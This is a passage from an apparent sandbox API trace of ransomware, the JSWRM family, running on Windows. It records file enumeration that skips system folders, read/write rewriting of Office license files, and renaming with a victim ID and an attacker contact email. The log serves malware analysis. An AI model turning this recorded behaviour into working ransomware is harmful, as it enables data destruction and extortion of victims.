dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0107.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0107.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0107.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0107.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0107.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0107.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0107.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0107.108] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe88bad46, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe88bad46, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe89c5db2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dea, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_MAK-ul-phn.xrm-ms", cAlternateFileName="PO9F56~1.XRM")) returned 1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.108] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.109] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.109] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.109] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0107.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.110] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19946) returned 1 [0107.110] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0107.110] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0107.112] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.112] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0107.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.112] CloseHandle (hObject=0x45c) returned 1 [0107.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0107.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0107.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0107.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0107.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0107.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0107.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0107.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0107.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0107.114] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8af70c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8af70c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8b8fa3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bd3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="PRE60B~1.XRM")) returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.124] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0107.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0107.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0107.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0107.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0107.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0107.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0107.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0107.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.126] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11219) returned 1 [0107.126] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bd0) returned 0x24c1d0 [0107.126] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bd0, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.128] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bd0, lpOverlapped=0x0) returned 1 [0107.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.128] CloseHandle (hObject=0x45c) returned 1 [0107.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0107.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0107.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0107.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0107.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0107.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0107.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0107.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.130] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8aaac09, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8aaac09, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8b43559, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5adf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="PR91B2~1.XRM")) returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.130] lstrcmpiW (lpString1="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0107.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0107.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0107.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0107.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0107.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0107.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0107.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0107.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0107.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0107.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.131] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23263) returned 1 [0107.131] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ad0) returned 0x24c1d0 [0107.131] 